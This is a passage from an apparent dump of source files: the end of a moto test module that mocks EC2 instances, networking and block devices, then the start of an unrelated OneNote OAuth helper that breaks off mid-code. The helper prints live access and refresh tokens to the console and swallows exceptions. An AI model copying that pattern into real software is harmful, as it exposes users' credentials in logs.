(\n ipaddress.ip_network(""192.168.42.0/24""),\n ipaddress.ip_network(""192.168.42.0/25""),\n ),\n ]\n\n # Tests instances are created with the correct IPs\n for vpc_cidr, subnet_cidr in ip_networks:\n resp = client.create_vpc(\n CidrBlock=str(vpc_cidr),\n AmazonProvidedIpv6CidrBlock=False,\n DryRun=False,\n InstanceTenancy=""default"",\n )\n vpc_id = resp[""Vpc""][""VpcId""]\n\n resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)\n subnet_id = resp[""Subnet""][""SubnetId""]\n\n resp = client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id\n )\n instance = resp[""Instances""][0]\n instance[""SubnetId""].should.equal(subnet_id)\n\n priv_ipv4 = ipaddress.ip_address(six.text_type(instance[""PrivateIpAddress""]))\n subnet_cidr.should.contain(priv_ipv4)\n\n\n@mock_ec2\ndef test_run_instance_with_specified_private_ipv4():\n client = boto3.client(""ec2"", region_name=""eu-central-1"")\n\n vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")\n subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")\n\n resp = client.create_vpc(\n CidrBlock=str(vpc_cidr),\n AmazonProvidedIpv6CidrBlock=False,\n DryRun=False,\n InstanceTenancy=""default"",\n )\n vpc_id = resp[""Vpc""][""VpcId""]\n\n resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)\n subnet_id = resp[""Subnet""][""SubnetId""]\n\n resp = client.run_instances(\n ImageId=EXAMPLE_AMI_ID,\n MaxCount=1,\n MinCount=1,\n SubnetId=subnet_id,\n PrivateIpAddress=""127.0.0.1"",\n )\n instance = resp[""Instances""][0]\n instance[""SubnetId""].should.equal(subnet_id)\n instance[""PrivateIpAddress""].should.equal(""127.0.0.1"")\n\n\n@mock_ec2\ndef test_run_instance_mapped_public_ipv4():\n client = boto3.client(""ec2"", region_name=""eu-central-1"")\n\n vpc_cidr = ipaddress.ip_network(""192.168.42.0/24"")\n subnet_cidr = ipaddress.ip_network(""192.168.42.0/25"")\n\n resp = client.create_vpc(\n CidrBlock=str(vpc_cidr),\n AmazonProvidedIpv6CidrBlock=False,\n DryRun=False,\n InstanceTenancy=""default"",\n )\n vpc_id = resp[""Vpc""][""VpcId""]\n\n resp = client.create_subnet(CidrBlock=str(subnet_cidr), VpcId=vpc_id)\n subnet_id = resp[""Subnet""][""SubnetId""]\n client.modify_subnet_attribute(\n SubnetId=subnet_id, MapPublicIpOnLaunch={""Value"": True}\n )\n\n resp = client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, SubnetId=subnet_id\n )\n instance = resp[""Instances""][0]\n instance.should.contain(""PublicDnsName"")\n instance.should.contain(""PublicIpAddress"")\n len(instance[""PublicDnsName""]).should.be.greater_than(0)\n len(instance[""PublicIpAddress""]).should.be.greater_than(0)\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_nic_autocreated():\n conn = boto.connect_vpc(""the_key"", ""the_secret"")\n vpc = conn.create_vpc(""10.0.0.0/16"")\n subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")\n security_group1 = conn.create_security_group(\n ""test security group #1"", ""this is a test security group""\n )\n security_group2 = conn.create_security_group(\n ""test security group #2"", ""this is a test security group""\n )\n private_ip = ""127.0.0.1""\n\n reservation = conn.run_instances(\n EXAMPLE_AMI_ID,\n subnet_id=subnet.id,\n security_groups=[security_group1.name],\n security_group_ids=[security_group2.id],\n private_ip_address=private_ip,\n )\n instance = reservation.instances[0]\n\n all_enis = conn.get_all_network_interfaces()\n all_enis.should.have.length_of(1)\n eni = all_enis[0]\n\n instance.interfaces.should.have.length_of(1)\n 
instance.interfaces[0].id.should.equal(eni.id)\n\n instance.subnet_id.should.equal(subnet.id)\n instance.groups.should.have.length_of(2)\n set([group.id for group in instance.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n\n eni.subnet_id.should.equal(subnet.id)\n eni.groups.should.have.length_of(2)\n set([group.id for group in eni.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n eni.private_ip_addresses.should.have.length_of(1)\n eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_nic_preexisting():\n conn = boto.connect_vpc(""the_key"", ""the_secret"")\n vpc = conn.create_vpc(""10.0.0.0/16"")\n subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")\n security_group1 = conn.create_security_group(\n ""test security group #1"", ""this is a test security group""\n )\n security_group2 = conn.create_security_group(\n ""test security group #2"", ""this is a test security group""\n )\n private_ip = ""127.0.0.1""\n eni = conn.create_network_interface(\n subnet.id, private_ip, groups=[security_group1.id]\n )\n\n # Boto requires NetworkInterfaceCollection of NetworkInterfaceSpecifications...\n # annoying, but generates the desired querystring.\n from boto.ec2.networkinterface import (\n NetworkInterfaceSpecification,\n NetworkInterfaceCollection,\n )\n\n interface = NetworkInterfaceSpecification(\n network_interface_id=eni.id, device_index=0\n )\n interfaces = NetworkInterfaceCollection(interface)\n # end Boto objects\n\n reservation = conn.run_instances(\n EXAMPLE_AMI_ID,\n network_interfaces=interfaces,\n security_group_ids=[security_group2.id],\n )\n instance = reservation.instances[0]\n\n instance.subnet_id.should.equal(subnet.id)\n\n all_enis = conn.get_all_network_interfaces()\n all_enis.should.have.length_of(1)\n\n instance.interfaces.should.have.length_of(1)\n instance_eni = instance.interfaces[0]\n instance_eni.id.should.equal(eni.id)\n\n instance_eni.subnet_id.should.equal(subnet.id)\n instance_eni.groups.should.have.length_of(2)\n set([group.id for group in instance_eni.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n instance_eni.private_ip_addresses.should.have.length_of(1)\n instance_eni.private_ip_addresses[0].private_ip_address.should.equal(private_ip)\n\n\n@requires_boto_gte(""2.32.0"")\n@mock_ec2_deprecated\ndef test_instance_with_nic_attach_detach():\n conn = boto.connect_vpc(""the_key"", ""the_secret"")\n vpc = conn.create_vpc(""10.0.0.0/16"")\n subnet = conn.create_subnet(vpc.id, ""10.0.0.0/18"")\n\n security_group1 = conn.create_security_group(\n ""test security group #1"", ""this is a test security group""\n )\n security_group2 = conn.create_security_group(\n ""test security group #2"", ""this is a test security group""\n )\n\n reservation = conn.run_instances(\n EXAMPLE_AMI_ID, security_group_ids=[security_group1.id]\n )\n instance = reservation.instances[0]\n\n eni = conn.create_network_interface(subnet.id, groups=[security_group2.id])\n\n # Check initial instance and ENI data\n instance.interfaces.should.have.length_of(1)\n\n eni.groups.should.have.length_of(1)\n set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))\n\n # Attach\n with pytest.raises(EC2ResponseError) as ex:\n conn.attach_network_interface(eni.id, instance.id, device_index=1, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error 
occurred (DryRunOperation) when calling the AttachNetworkInterface operation: Request would have succeeded, but DryRun flag is set""\n )\n\n conn.attach_network_interface(eni.id, instance.id, device_index=1)\n\n # Check attached instance and ENI data\n instance.update()\n instance.interfaces.should.have.length_of(2)\n instance_eni = instance.interfaces[1]\n instance_eni.id.should.equal(eni.id)\n instance_eni.groups.should.have.length_of(2)\n set([group.id for group in instance_eni.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n\n eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0]\n eni.groups.should.have.length_of(2)\n set([group.id for group in eni.groups]).should.equal(\n set([security_group1.id, security_group2.id])\n )\n\n # Detach\n with pytest.raises(EC2ResponseError) as ex:\n conn.detach_network_interface(instance_eni.attachment.id, dry_run=True)\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the DetachNetworkInterface operation: Request would have succeeded, but DryRun flag is set""\n )\n\n conn.detach_network_interface(instance_eni.attachment.id)\n\n # Check detached instance and ENI data\n instance.update()\n instance.interfaces.should.have.length_of(1)\n\n eni = conn.get_all_network_interfaces(filters={""network-interface-id"": eni.id})[0]\n eni.groups.should.have.length_of(1)\n set([group.id for group in eni.groups]).should.equal(set([security_group2.id]))\n\n # Detach with invalid attachment ID\n with pytest.raises(EC2ResponseError) as cm:\n conn.detach_network_interface(""eni-attach-1234abcd"")\n cm.value.code.should.equal(""InvalidAttachmentID.NotFound"")\n cm.value.status.should.equal(400)\n cm.value.request_id.should_not.be.none\n\n\n@mock_ec2_deprecated\ndef test_ec2_classic_has_public_ip_address():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n instance = reservation.instances[0]\n instance.ip_address.should_not.equal(None)\n instance.public_dns_name.should.contain(instance.ip_address.replace(""."", ""-""))\n instance.private_ip_address.should_not.equal(None)\n instance.private_dns_name.should.contain(\n instance.private_ip_address.replace(""."", ""-"")\n )\n\n\n@mock_ec2_deprecated\ndef test_run_instance_with_keypair():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n instance = reservation.instances[0]\n\n instance.key_name.should.equal(""keypair_name"")\n\n\n@mock_ec2\ndef test_run_instance_with_block_device_mappings():\n ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")\n\n kwargs = {\n ""MinCount"": 1,\n ""MaxCount"": 1,\n ""ImageId"": EXAMPLE_AMI_ID,\n ""KeyName"": ""the_key"",\n ""InstanceType"": ""t1.micro"",\n ""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeSize"": 50}}],\n }\n\n ec2_client.run_instances(**kwargs)\n\n instances = ec2_client.describe_instances()\n volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][\n ""Ebs""\n ]\n\n volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]])\n volumes[""Volumes""][0][""Size""].should.equal(50)\n\n\n@mock_ec2\ndef test_run_instance_with_block_device_mappings_missing_ebs():\n ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")\n\n kwargs = {\n ""MinCount"": 
1,\n ""MaxCount"": 1,\n ""ImageId"": EXAMPLE_AMI_ID,\n ""KeyName"": ""the_key"",\n ""InstanceType"": ""t1.micro"",\n ""BlockDeviceMappings"": [{""DeviceName"": ""/dev/sda2""}],\n }\n with pytest.raises(ClientError) as ex:\n ec2_client.run_instances(**kwargs)\n\n ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"")\n ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)\n ex.value.response[""Error""][""Message""].should.equal(\n ""The request must contain the parameter ebs""\n )\n\n\n@mock_ec2\ndef test_run_instance_with_block_device_mappings_missing_size():\n ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")\n\n kwargs = {\n ""MinCount"": 1,\n ""MaxCount"": 1,\n ""ImageId"": EXAMPLE_AMI_ID,\n ""KeyName"": ""the_key"",\n ""InstanceType"": ""t1.micro"",\n ""BlockDeviceMappings"": [\n {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""VolumeType"": ""standard""}}\n ],\n }\n with pytest.raises(ClientError) as ex:\n ec2_client.run_instances(**kwargs)\n\n ex.value.response[""Error""][""Code""].should.equal(""MissingParameter"")\n ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)\n ex.value.response[""Error""][""Message""].should.equal(\n ""The request must contain the parameter size or snapshotId""\n )\n\n\n@mock_ec2\ndef test_run_instance_with_block_device_mappings_from_snapshot():\n ec2_client = boto3.client(""ec2"", region_name=""us-east-1"")\n ec2_resource = boto3.resource(""ec2"", region_name=""us-east-1"")\n volume_details = {\n ""AvailabilityZone"": ""1a"",\n ""Size"": 30,\n }\n\n volume = ec2_resource.create_volume(**volume_details)\n snapshot = volume.create_snapshot()\n kwargs = {\n ""MinCount"": 1,\n ""MaxCount"": 1,\n ""ImageId"": EXAMPLE_AMI_ID,\n ""KeyName"": ""the_key"",\n ""InstanceType"": ""t1.micro"",\n ""BlockDeviceMappings"": [\n {""DeviceName"": ""/dev/sda2"", ""Ebs"": {""SnapshotId"": snapshot.snapshot_id}}\n ],\n }\n\n ec2_client.run_instances(**kwargs)\n\n instances = ec2_client.describe_instances()\n volume = instances[""Reservations""][0][""Instances""][0][""BlockDeviceMappings""][0][\n ""Ebs""\n ]\n\n volumes = ec2_client.describe_volumes(VolumeIds=[volume[""VolumeId""]])\n\n volumes[""Volumes""][0][""Size""].should.equal(30)\n volumes[""Volumes""][0][""SnapshotId""].should.equal(snapshot.snapshot_id)\n\n\n@mock_ec2_deprecated\ndef test_describe_instance_status_no_instances():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n all_status = conn.get_all_instance_status()\n len(all_status).should.equal(0)\n\n\n@mock_ec2_deprecated\ndef test_describe_instance_status_with_instances():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n\n all_status = conn.get_all_instance_status()\n len(all_status).should.equal(1)\n all_status[0].instance_status.status.should.equal(""ok"")\n all_status[0].system_status.status.should.equal(""ok"")\n\n\n@mock_ec2_deprecated\ndef test_describe_instance_status_with_instance_filter_deprecated():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n\n # We want to filter based on this one\n reservation = conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n instance = reservation.instances[0]\n\n # This is just to setup the test\n conn.run_instances(EXAMPLE_AMI_ID, key_name=""keypair_name"")\n\n all_status = conn.get_all_instance_status(instance_ids=[instance.id])\n len(all_status).should.equal(1)\n all_status[0].id.should.equal(instance.id)\n\n # Call get_all_instance_status with a 
bad id should raise an error\n with pytest.raises(EC2ResponseError) as cm:\n conn.get_all_instance_status(instance_ids=[instance.id, ""i-1234abcd""])\n cm.value.code.should.equal(""InvalidInstanceID.NotFound"")\n cm.value.status.should.equal(400)\n cm.value.request_id.should_not.be.none\n\n\n@mock_ec2\ndef test_describe_instance_credit_specifications():\n conn = boto3.client(""ec2"", region_name=""us-west-1"")\n\n # We want to filter based on this one\n reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n result = conn.describe_instance_credit_specifications(\n InstanceIds=[reservation[""Instances""][0][""InstanceId""]]\n )\n assert (\n result[""InstanceCreditSpecifications""][0][""InstanceId""]\n == reservation[""Instances""][0][""InstanceId""]\n )\n\n\n@mock_ec2\ndef test_describe_instance_status_with_instance_filter():\n conn = boto3.client(""ec2"", region_name=""us-west-1"")\n\n # We want to filter based on this one\n reservation = conn.run_instances(ImageId=EXAMPLE_AMI_ID, MinCount=3, MaxCount=3)\n instance1 = reservation[""Instances""][0]\n instance2 = reservation[""Instances""][1]\n instance3 = reservation[""Instances""][2]\n conn.stop_instances(InstanceIds=[instance1[""InstanceId""]])\n stopped_instance_ids = [instance1[""InstanceId""]]\n running_instance_ids = sorted([instance2[""InstanceId""], instance3[""InstanceId""]])\n all_instance_ids = sorted(stopped_instance_ids + running_instance_ids)\n\n # Filter instance using the state name\n state_name_filter = {\n ""running_and_stopped"": [\n {""Name"": ""instance-state-name"", ""Values"": [""running"", ""stopped""]}\n ],\n ""running"": [{""Name"": ""instance-state-name"", ""Values"": [""running""]}],\n ""stopped"": [{""Name"": ""instance-state-name"", ""Values"": [""stopped""]}],\n }\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_name_filter[""running_and_stopped""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(all_instance_ids)\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_name_filter[""running""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(running_instance_ids)\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_name_filter[""stopped""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(stopped_instance_ids)\n\n # Filter instance using the state code\n state_code_filter = {\n ""running_and_stopped"": [\n {""Name"": ""instance-state-code"", ""Values"": [""16"", ""80""]}\n ],\n ""running"": [{""Name"": ""instance-state-code"", ""Values"": [""16""]}],\n ""stopped"": [{""Name"": ""instance-state-code"", ""Values"": [""80""]}],\n }\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_code_filter[""running_and_stopped""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(all_instance_ids)\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_code_filter[""running""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n 
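# Note: EC2 instance state codes map to the state names used above\n # (16 == running, 80 == stopped), so the state-code filters here should\n # select exactly the same instances as the corresponding state-name filters.\n 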
sorted(found_instance_ids).should.equal(running_instance_ids)\n\n found_statuses = conn.describe_instance_status(\n IncludeAllInstances=True, Filters=state_code_filter[""stopped""]\n )[""InstanceStatuses""]\n found_instance_ids = [status[""InstanceId""] for status in found_statuses]\n sorted(found_instance_ids).should.equal(stopped_instance_ids)\n\n\n@requires_boto_gte(""2.32.0"")\n@mock_ec2_deprecated\ndef test_describe_instance_status_with_non_running_instances():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n reservation = conn.run_instances(EXAMPLE_AMI_ID, min_count=3)\n instance1, instance2, instance3 = reservation.instances\n instance1.stop()\n instance2.terminate()\n\n all_running_status = conn.get_all_instance_status()\n all_running_status.should.have.length_of(1)\n all_running_status[0].id.should.equal(instance3.id)\n all_running_status[0].state_name.should.equal(""running"")\n\n all_status = conn.get_all_instance_status(include_all_instances=True)\n all_status.should.have.length_of(3)\n\n status1 = next((s for s in all_status if s.id == instance1.id), None)\n status1.state_name.should.equal(""stopped"")\n\n status2 = next((s for s in all_status if s.id == instance2.id), None)\n status2.state_name.should.equal(""terminated"")\n\n status3 = next((s for s in all_status if s.id == instance3.id), None)\n status3.state_name.should.equal(""running"")\n\n\n@mock_ec2_deprecated\ndef test_get_instance_by_security_group():\n conn = boto.connect_ec2(""the_key"", ""the_secret"")\n\n conn.run_instances(EXAMPLE_AMI_ID)\n instance = conn.get_only_instances()[0]\n\n security_group = conn.create_security_group(""test"", ""test"")\n\n with pytest.raises(EC2ResponseError) as ex:\n conn.modify_instance_attribute(\n instance.id, ""groupSet"", [security_group.id], dry_run=True\n )\n ex.value.error_code.should.equal(""DryRunOperation"")\n ex.value.status.should.equal(400)\n ex.value.message.should.equal(\n ""An error occurred (DryRunOperation) when calling the ModifyInstanceSecurityGroups operation: Request would have succeeded, but DryRun flag is set""\n )\n\n conn.modify_instance_attribute(instance.id, ""groupSet"", [security_group.id])\n\n security_group_instances = security_group.instances()\n\n assert len(security_group_instances) == 1\n assert security_group_instances[0].id == instance.id\n\n\n@mock_ec2\ndef test_modify_delete_on_termination():\n ec2_client = boto3.resource(""ec2"", region_name=""us-west-1"")\n result = ec2_client.create_instances(ImageId=EXAMPLE_AMI_ID, MinCount=1, MaxCount=1)\n instance = result[0]\n instance.load()\n instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(True)\n instance.modify_attribute(\n BlockDeviceMappings=[\n {""DeviceName"": ""/dev/sda1"", ""Ebs"": {""DeleteOnTermination"": False}}\n ]\n )\n instance.load()\n instance.block_device_mappings[0][""Ebs""][""DeleteOnTermination""].should.be(False)\n\n\n@mock_ec2\ndef test_create_instance_ebs_optimized():\n ec2_resource = boto3.resource(""ec2"", region_name=""eu-west-1"")\n\n instance = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1, EbsOptimized=True\n )[0]\n instance.load()\n instance.ebs_optimized.should.be(True)\n\n instance.modify_attribute(EbsOptimized={""Value"": False})\n instance.load()\n instance.ebs_optimized.should.be(False)\n\n instance = ec2_resource.create_instances(\n ImageId=EXAMPLE_AMI_ID, MaxCount=1, MinCount=1,\n )[0]\n instance.load()\n instance.ebs_optimized.should.be(False)\n\n\n@mock_ec2\ndef 
test_run_multiple_instances_in_same_command():\n instance_count = 4\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID, MinCount=instance_count, MaxCount=instance_count\n )\n reservations = client.describe_instances()[""Reservations""]\n\n reservations[0][""Instances""].should.have.length_of(instance_count)\n\n instances = reservations[0][""Instances""]\n for i in range(0, instance_count):\n instances[i][""AmiLaunchIndex""].should.be(i)\n\n\n@mock_ec2\ndef test_describe_instance_attribute():\n client = boto3.client(""ec2"", region_name=""us-east-1"")\n security_group_id = client.create_security_group(\n GroupName=""test security group"", Description=""this is a test security group""\n )[""GroupId""]\n client.run_instances(\n ImageId=EXAMPLE_AMI_ID,\n MinCount=1,\n MaxCount=1,\n SecurityGroupIds=[security_group_id],\n )\n instance_id = client.describe_instances()[""Reservations""][0][""Instances""][0][\n ""InstanceId""\n ]\n\n valid_instance_attributes = [\n ""instanceType"",\n ""kernel"",\n ""ramdisk"",\n ""userData"",\n ""disableApiTermination"",\n ""instanceInitiatedShutdownBehavior"",\n ""rootDeviceName"",\n ""blockDeviceMapping"",\n ""productCodes"",\n ""sourceDestCheck"",\n ""groupSet"",\n ""ebsOptimized"",\n ""sriovNetSupport"",\n ]\n\n for valid_instance_attribute in valid_instance_attributes:\n response = client.describe_instance_attribute(\n InstanceId=instance_id, Attribute=valid_instance_attribute\n )\n if valid_instance_attribute == ""groupSet"":\n response.should.have.key(""Groups"")\n response[""Groups""].should.have.length_of(1)\n response[""Groups""][0][""GroupId""].should.equal(security_group_id)\n elif valid_instance_attribute == ""userData"":\n response.should.have.key(""UserData"")\n response[""UserData""].should.be.empty\n\n invalid_instance_attributes = [\n ""abc"",\n ""Kernel"",\n ""RamDisk"",\n ""userdata"",\n ""iNsTaNcEtYpE"",\n ]\n\n for invalid_instance_attribute in invalid_instance_attributes:\n with pytest.raises(ClientError) as ex:\n client.describe_instance_attribute(\n InstanceId=instance_id, Attribute=invalid_instance_attribute\n )\n ex.value.response[""Error""][""Code""].should.equal(""InvalidParameterValue"")\n ex.value.response[""ResponseMetadata""][""HTTPStatusCode""].should.equal(400)\n message = ""Value ({invalid_instance_attribute}) for parameter attribute is invalid. Unknown attribute."".format(\n invalid_instance_attribute=invalid_instance_attribute\n )\n ex.value.response[""Error""][""Message""].should.equal(message)\n\n\n@mock_ec2\ndef test_warn_on_invalid_ami():\n if settings.TEST_SERVER_MODE:\n raise SkipTest(""Can\'t capture warnings in server mode."")\n ec2 = boto3.resource(""ec2"", ""us-east-1"")\n with pytest.warns(\n PendingDeprecationWarning,\n match=r""Could not find AMI with image-id:invalid-ami.+"",\n ):\n ec2.create_instances(ImageId=""invalid-ami"", MinCount=1, MaxCount=1)\n', '""""""\r\nPyOneNote.py\r\n~~~~~~~~~~~~~~~~~\r\n\r\nThis module contains a basic OAuth 2 Authentication and basic handler for GET and POST operations.\r\nThis work was just a quick hack to migrate notes from and old database to onenote but should hep you to understand\r\nthe request structure of OneNote.\r\n\r\nCopyright (c) 2016 Coffeemug13. All rights reserved. 
Licensed under the MIT license.\r\nSee LICENSE in the project root for license information.\r\n""""""\r\n\r\nimport requests\r\n\r\n\r\nclass OAuth():\r\n """"""Handles the authentication for all requests""""""\r\n\r\n def __init__(self, client_id, client_secret, code=None, token=None, refresh_token=None):\r\n """""" This information is obtained upon registration of a new Outlook Application\r\n The values are just for information and not valid\r\n :param client_id: ""cda3ffaa-2345-a122-3454-adadc556e7bf""\r\n :param client_secret: ""AABfsafd6Q5d1VZmJQNsdac""\r\n :param code: = ""PI:KEY""\r\n :param token: = ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW......""\r\n :param rtoken: = ""MCKKgf55PCiM2aACbIYads*sdsa%*PWYNj436348v......"" """"""\r\n self.client_id = client_id\r\n self.client_secret = client_secret\r\n self.code = code\r\n self.token = token\r\n self.rtoken = refresh_token\r\n self.redirect_uri = \'https://localhost\'\r\n self.session = requests.Session()\r\n\r\n @staticmethod\r\n def get_authorize_url(client_id):\r\n ""open this url in a browser to let the user grant access to onenote. Extract from the return URL your access code""\r\n url = ""https://login.live.com/oauth20_authorize.srf?client_id={0}&scope=wl.signin%20wl.offline_access%20wl.basic%20office.onenote_create&response_type=code&redirect_uri=https://localhost"".format(\r\n client_id)\r\n return url\r\n\r\n def get_token(self):\r\n """"""\r\n Make the following request with e.g. postman:\r\n POST https://login.live.com/oauth20_token.srf\r\n Content-Type:application/x-www-form-urlencoded\r\n\r\n grant_type:authorization_code\r\n client_id:cda3ffaa-2345-a122-3454-adadc556e7bf\r\n client_secret:AABfsafd6Q5d1VZmJQNsdac\r\n code:111111111-1111-1111-1111-111111111111\r\n redirect_uri:https://localhost\r\n \r\n OneNote will return as result:\r\n {\r\n ""token_type"": ""bearer"",\r\n ""expires_in"": 3600,\r\n ""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"",\r\n ""access_token"": ""AxxdWR1DBAAUGCCXc8wU/...."",\r\n ""refresh_token"": ""DR3DDEQJPCiM2aACbIYa...."",\r\n ""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""\r\n }\r\n """"""\r\n raise NotImplementedError("""")\r\n\r\n def refresh_token(self):\r\n """"""\r\n Make the following reqest to refresh you token with e.g. 
postman:\r\n POST https://login.live.com/oauth20_token.srf\r\n Content-Type:application/x-www-form-urlencoded\r\n\r\n grant_type:refresh_token\r\n client_id:cda3ffaa-2345-a122-3454-adadc556e7bf\r\n client_secret:AABfsafd6Q5d1VZmJQNsdac\r\n refresh_token:DR3DDEQJPCiM2aACbIYa....\r\n redirect_uri:https://localhost\r\n -->\r\n {\r\n ""token_type"": ""bearer"",\r\n ""expires_in"": 3600,\r\n ""scope"": ""wl.signin wl.offline_access wl.basic office.onenote_create office.onenote"",\r\n ""access_token"": ""EAFSDTBRB$/UGCCXc8wU/zFu9QnLdZXy+YnElFkAAW..."",\r\n ""refresh_token"": ""DSFDSGSGFABDBGFGBFGF5435kFGDd2J6Bco2Pv2ss..."",\r\n ""user_id"": ""AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""\r\n }\r\n """"""\r\n url = \'https://login.live.com/oauth20_token.srf\'\r\n headers = {""Content-Type"": ""application/x-www-form-urlencoded""}\r\n data = {""grant_type"": ""refresh_token"",\r\n ""client_id"": self.client_id,\r\n ""client_secret"": self.client_secret,\r\n ""refresh_token"": self.rtoken,\r\n ""redirect_uri"": self.redirect_uri}\r\n\r\n result = self.session.post(url, headers=headers, data=data)\r\n\r\n print(""Refreshed token: "" + result.text)\r\n refresh = result.json()\r\n self.expire = refresh.get(\'expires_in\')\r\n self.token = refresh.get(\'access_token\')\r\n self.rtoken = refresh.get(\'refresh_token\')\r\n print(""Token: "" + self.token)\r\n print(""Refresh Token: "" + self.rtoken)\r\n return True\r\n\r\n def _get(self, url, query):\r\n """"""Handles GET Request with Authentication""""""\r\n headers = {\'user-agent\': \'my-app/0.0.1\', \'Authorization\': \'Bearer \' + self.token}\r\n result = self.session.get(url, headers=headers, params=query)\r\n print(""GET "" + result.url)\r\n print(result.headers)\r\n if (result.text):\r\n print(result.text)\r\n return result\r\n\r\n def _post(self, url: str, headers: list, data: str = None, files: list = None):\r\n """"""Handles POST Request with Authentication""""""\r\n newHeaders = {\'user-agent\': \'my-app/0.0.1\', \'Authorization\': \'Bearer \' + self.token}\r\n if data:\r\n newHeaders.update(headers)\r\n result = self.session.post(url, headers=newHeaders, data=data)\r\n else:\r\n result = self.session.post(url, headers=newHeaders, files=files)\r\n # result.request.headers\r\n print(""POST "" + result.url)\r\n print(result.headers)\r\n if (result.text):\r\n print(result.text)\r\n return result\r\n\r\n def post(self, url: str, headers: list, data: str = None, files: list = None):\r\n """"""post something and handle token expire transparent to the caller""""""\r\n try:\r\n result = self._post(url, headers, data=data, files=files)\r\n if (result.status_code not in (200, 201)):\r\n print(""Error: "" + str(result.status_code))\r\n if (result.status_code == 401):\r\n print(""Refreshing token"")\r\n if self.refresh_token():\r\n result = self._post(url, headers, data, files=files)\r\n else:\r\n print(\'Failed retry refreshing token\')\r\n return result\r\n except Exception as e:\r\n print(e)\r\n pass\r\n\r\n def get(self, url, query, headers=None):\r\n """"""get something and handle token expire transparent to the caller""""""\r\n try:\r\n result = self._get(url, query)\r\n if (result.status_code != requests.codes.ok):\r\n print(""Error: "" + str(result.status_code))\r\n if (result.status_code == 401):\r\n print(""Refreshing token"")\r\n if self.refresh_token():\r\n result = self._get(url, query)\r\n else:\r\n print(\'Failed retry refreshing token\')\r\n return result\r\n except Exception as e:\r\n print(e)\r\n pass\r\n\r\n def 
